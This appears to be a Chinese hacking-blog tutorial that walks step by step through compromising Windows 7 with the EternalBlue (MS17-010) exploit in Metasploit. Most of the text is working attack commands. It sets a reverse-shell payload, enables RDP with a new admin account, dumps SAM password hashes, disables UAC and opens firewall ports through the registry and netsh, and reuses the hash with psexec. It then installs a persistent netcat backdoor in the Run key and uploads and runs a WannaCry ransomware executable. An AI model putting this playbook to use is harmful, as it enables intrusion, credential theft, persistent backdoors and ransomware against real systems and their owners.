永恒之蓝渗透windows7的进阶玩法

永恒之蓝渗透win 7

首先呢,丑话说前面,并不是所有win7版本都适合用永恒之蓝

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

官方描述:https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17永恒之蓝相关病毒,其实是利用了微软的 MS17-010 漏洞。MS17-010 是 Windows 系统一服务的漏洞,恶意代码会扫描开放 445 文件共享端口的 Windows 机器,无需用户任何操作,只网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意

 

永恒之蓝是因为win7默认开启了445端口,才导致漏洞的发生

下面开始复现

首先我们启动一下msf

1.msfdb run

我比较喜欢用这个命令,当然也可以用msfconsole

2.use auxiliary/scanner/smb/smb_ms17_010

利用扫描模块检测漏洞的价值

3.set rhosts xxx.xxx.xxx.xxx

设置靶机ip,内网ip形式如:192.168.x.x,可以通过nmap扫描或cmd的ipconfig进行信息收集

扫描完成后发现可利用,在进行下一步的步骤

4.use exploit/windows/smb/ms17_010_eternalblue

利用攻击脚本

5.set rhosts xxx.xxx.xxx.xxx

和上面的一样的意思

其实可以show options

查看参数,设置一下端口

6.set lhost xxx.xxx.xxx.xxx

注意这个填你主机ip

7.set payloadwindows/x64/meterpreter/reverse_tcp

这是重中之重,需要设置payload,如果靶机是64位的,那么用上面的,不是64位的,以上payload无效,没法进行渗透

8.exploit

直接开打

getuid查看下权限

后期可以提权

打进来就可以有许多好玩的了哈哈哈

比如screenshare 屏幕监视

但这不是主要目的

我们要创建账户,当然你也可以选择提取sam,我也会讲

我们先说一下远程桌面

实战:使用 enable_rdp 脚本开启远程桌面并创建用户

ok,我们先了解一下rdp协议

RDP 概述:远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)
的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。

远程桌面协议(RDP)是一个多通道(multi-channel)的协议,让使用者(所在计算机称为用户端或’本地计算机’)连上提供微软终端机服务的计算机(称为服务端或’远程计算机’)。

大部分的Windows版本都有用户端所需软件,有些其他操作系统也有这些用户端软件,例如Linux,FreeBSD,MacOSX,服务端计算机方面,则听取送到TCPport3389的数据。

简单的来说,就是你要远程桌面,就需要开启rdp

启用远程桌面

run post/windows/manage/enable_rdp

创建一个新用户来远程连接 win7 桌面

run post/windows/manage/enable_rdp USERNAME=admin
PASSWORD=123456

在 Kali 系统上,按下 Ctrl+shift+t 新建终端窗口,或点击终端按钮开启一个终端

直接输入 rdesktop xxx.xxx.xxx.xxx

靶机ip

账户:admin

密码:123456

30 秒之后成功登陆远程桌面

关闭主机防护策略并开启后门

通过 ms17-010 永恒之蓝获取到的 shell 可能会出现操作受限的情况,所以我们使用主机的账户信息建立 session 进行连接

 

SAM 概述:SAM 文件即账号密码数据库文件,SAM 文件的位置是:
C:\Windows\System32\config\SAM

回到 MSF 控制台,从 SAM 导出密码哈希

hashdump

我们创建一条防火墙规则允许 4444端口访问网络,否则我们建立 session 时 payload 不能通过 4444端口访问网络导致 session 建立失败。

msf控制台输入shell

再输入netsh firewall add portopening TCP 4444 “xuegod” ENABLE ALL

UAC 概述:用户帐户控制(User Account Control,简写作 UAC)是微软公司在其 Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果

关闭 UAC

在windows shell下输入cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /tREG_DWORD /d 0 /f

 

ADD 添加一个注册表项
-v 创建键值
-t 键值类型
-d 键值的值
-f 强制修改注册表项

 

开启 win7 系统主机的默认共享,默认共享对 Windows 主机的文件共享非常方便,也方便黑客利用这个功能,远程执行命令

cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /vLocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

C:\Windows\system32>exit C:\Windows\system32>exitC:\Windows\system32>exitexit我们先将 session 保存到后台meterpreter > backgrou

 

使用 hash 值登录系统
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.1.56
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.1.53
配置用户信息
msf5 exploit(windows/smb/psexec) > set SMBUser xuegod
密码使用哈希值
msf5 exploit(windows/smb/psexec) > set SMBPass
aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4

这里局域网中 SMBDomain 都是 WORKGROUP 如果是域用户需要配置域名称。
msf5 exploit(windows/smb/psexec) > set SMBDomain WORKGROUP
msf5 exploit(windows/smb/psexec) > exploit

在msf控制台输入getuid

我们可以看到虽然我们使用 xuegod 用户进行认证但是我们同样获取到了 SYSTEM 的权限
下面我们配置一个后门程序,修改 UAC 的注册表,需要重启才能生效。
上传 nc 到 Win7
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows
注册表添加启动项执行 nc 反弹 shell 命令
meterpreter > reg setval -k
HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d ‘C:\windows\
nc.exe -Ldp 443 -e cmd.exe’
nc 参数解释:
L 表示用户退出连接后重新进行端口侦听
d 后台运行
p 指定端口
meterpreter > shell
防火墙允许 443 端口访问网络否则开机的时需要用户点击允许访问网络才可以成功执行。
C:\Windows\system32> netsh firewall add portopening TCP 443 “xuegod443” ENABLE
ALL
重启 Win7
C:\Windows\system32>shutdown -r -f -t 0
-r 重启
-f 强制
-t 时间 0 表示立刻

上传勒索文件至 C 盘根目录下,为了隐蔽可以传至更隐蔽目录
upload wannacry.exe c:\
2、执行勒索可执行文件即可
execute -f c:\wannacry.exe

我的红客论坛主页:jingdutiao的空间 – 红客联盟 – 08安全团队组建 – Powered by Discuz! (ihonker.com)

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
下一篇